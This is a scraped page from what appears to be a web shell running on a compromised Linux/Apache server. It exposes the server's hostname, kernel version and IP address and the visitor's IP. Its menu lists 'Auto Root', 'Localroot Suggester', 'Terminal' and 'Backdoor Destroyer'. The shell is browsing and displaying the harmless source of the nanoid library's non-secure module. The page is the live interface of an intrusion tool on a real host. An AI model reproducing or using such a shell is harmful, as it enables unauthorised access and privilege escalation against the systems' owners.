Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
nanoid /
non-secure /
Delete
Unzip
Name
Size
Permission
Date
Action
index.cjs
1.11
KB
-rw-r--r--
2023-10-17 14:47
index.d.ts
983
B
-rw-r--r--
2023-10-17 14:47
index.js
1.05
KB
-rw-r--r--
2023-10-17 14:47
Save
Rename
// This alphabet uses `A-Za-z0-9_-` symbols. // The order of characters is optimized for better gzip and brotli compression. // References to the same file (works both for gzip and brotli): // `'use`, `andom`, and `rict'` // References to the brotli default dictionary: // `-26T`, `1983`, `40px`, `75px`, `bush`, `jack`, `mind`, `very`, and `wolf` let urlAlphabet = 'useandom-26T198340PX75pxJACKVERYMINDBUSHWOLF_GQZbfghjklqvwyzrict'; let customAlphabet = (alphabet, defaultSize = 21) => { return (size = defaultSize) => { let id = ''; // A compact alternative for `for (var i = 0; i < step; i++)`. let i = size; while (i--) { // `| 0` is more compact and faster than `Math.floor()`. id += alphabet[(Math.random() * alphabet.length) | 0]; } return id } }; let nanoid = (size = 21) => { let id = ''; // A compact alternative for `for (var i = 0; i < step; i++)`. let i = size; while (i--) { // `| 0` is more compact and faster than `Math.floor()`. id += urlAlphabet[(Math.random() * 64) | 0]; } return id }; exports.customAlphabet = customAlphabet; exports.nanoid = nanoid;